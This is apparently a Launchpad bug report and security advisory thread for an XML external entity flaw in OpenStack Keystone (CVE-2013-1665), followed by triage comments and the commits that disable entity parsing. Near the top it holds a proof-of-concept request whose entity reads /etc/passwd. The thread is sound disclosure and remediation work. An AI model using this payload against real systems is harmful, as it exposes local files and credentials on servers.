OpenStack Identity (Keystone)

[OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

Reported by Thierry Carrez on 2013-01-16
282
This bug affects 3 people
Affects Status Importance Assigned to Milestone
Keystone
High
Dolph Mathews
Essex
High
Dolph Mathews
Folsom
High
Dolph Mathews
OpenStack Security Advisory
Undecided
Thierry Carrez

Bug Description

Evil XML ! Jonathan Murray from NCC Group reported that you can leak local file contents using XML entities in Keystone requests:

POST /v2.0//OS-KSDM/roles HTTP/1.1
x-auth-token: d0e1a2d3b4e5e6f7
content-type: application/xml

<!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:///etc/passwd"> ]>
<role>
<name>&ent;</name>
</role>

just returns the content of the local file in role.name.

Looks like we should disable parsing entities altogether, they seem to be exploitable ion pretty awesome ways. I'm not sure only Keystone is affected by this.

Thierry Carrez (ttx) wrote :

Adding Joe Heck and Dan Prince for confirmation.

Thierry Carrez (ttx) wrote :

Dolph: I suspect your patch from bug 1100282 would solve that one as well ?

Thierry Carrez (ttx) wrote :

proposed combined impact description on bug 1100282

Dolph Mathews (dolph) wrote :

Agree; fix for bug 1100282 solves this one as well on essex + folsom + master.

Changed in keystone:
assignee: nobody → Dolph Mathews (dolph)
status: New → Confirmed
Dolph Mathews (dolph) wrote :

There's a couple typos in the example above, but I was able to use this method to read /etc/passwd through the API.

Dolph Mathews (dolph) wrote :

I also confirmed that the fix for bug 1100282 eliminates the issue.

Running that fix with the above example results in the service simply receiving an empty string for the role name.

Thierry Carrez (ttx) wrote :

OK, disclosure process will be handled on bug 1100282.

Mark McLoughlin (markmc) on 2013-01-22
Changed in keystone:
milestone: none → 2012.2.3
Mark McLoughlin (markmc) on 2013-01-25
Changed in keystone:
milestone: 2012.2.3 → none
Thierry Carrez (ttx) on 2013-01-30
Changed in keystone:
importance: Undecided → High
status: Confirmed → Triaged
Thierry Carrez (ttx) wrote :

Issue was independently reported by Stuart Stent as duplicate bug 1111828

Thierry Carrez (ttx) on 2013-02-19
summary: - Local file leak through entities in XML requests
+ Local file leak through entities in XML requests (CVE-2013-1665)
Thierry Carrez (ttx) on 2013-02-19
information type: Private Security → Public Security

Fix proposed to branch: stable/folsom
Review: https://review.openstack.org/22314

Changed in keystone:
status: Triaged → In Progress

Reviewed: https://review.openstack.org/22314
Committed: http://github.com/openstack/keystone/commit/8a2274595ac628b2373eab0cb14690f866b7a024
Submitter: Jenkins
Branch: stable/folsom

commit 8a2274595ac628b2373eab0cb14690f866b7a024
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:04:11 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: Ibf2d73bca17b689cfa2dfd29eb15ea6e7458a123

Reviewed: https://review.openstack.org/22315
Committed: http://github.com/openstack/keystone/commit/2afe8e46893ca27ea9d61f29419d0ec23a6d8db3
Submitter: Jenkins
Branch: master

commit 2afe8e46893ca27ea9d61f29419d0ec23a6d8db3
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:00:40 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: I6a7c9e7110e1c7890205d6e4550ab46295c68906

Changed in keystone:
status: In Progress → Fix Committed

Reviewed: https://review.openstack.org/22316
Committed: http://github.com/openstack/keystone/commit/8945567b5ec39c7f32f27aec4eccf230cc86646c
Submitter: Jenkins
Branch: stable/essex

commit 8945567b5ec39c7f32f27aec4eccf230cc86646c
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:08:41 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: Idd3989356dfededc3d863770f0ca1661c1d45782

Thierry Carrez (ttx) on 2013-02-21
Changed in keystone:
milestone: none → grizzly-3
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2013-04-04
Changed in keystone:
milestone: grizzly-3 → 2013.1
Thierry Carrez (ttx) on 2013-05-24
summary: - Local file leak through entities in XML requests (CVE-2013-1665)
+ [OSSA 2013-004] Local file leak through entities in XML requests
+ (CVE-2013-1665)
Changed in ossa:
assignee: nobody → Thierry Carrez (ttx)
status: New → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Duplicates of this bug

Other bug subscribers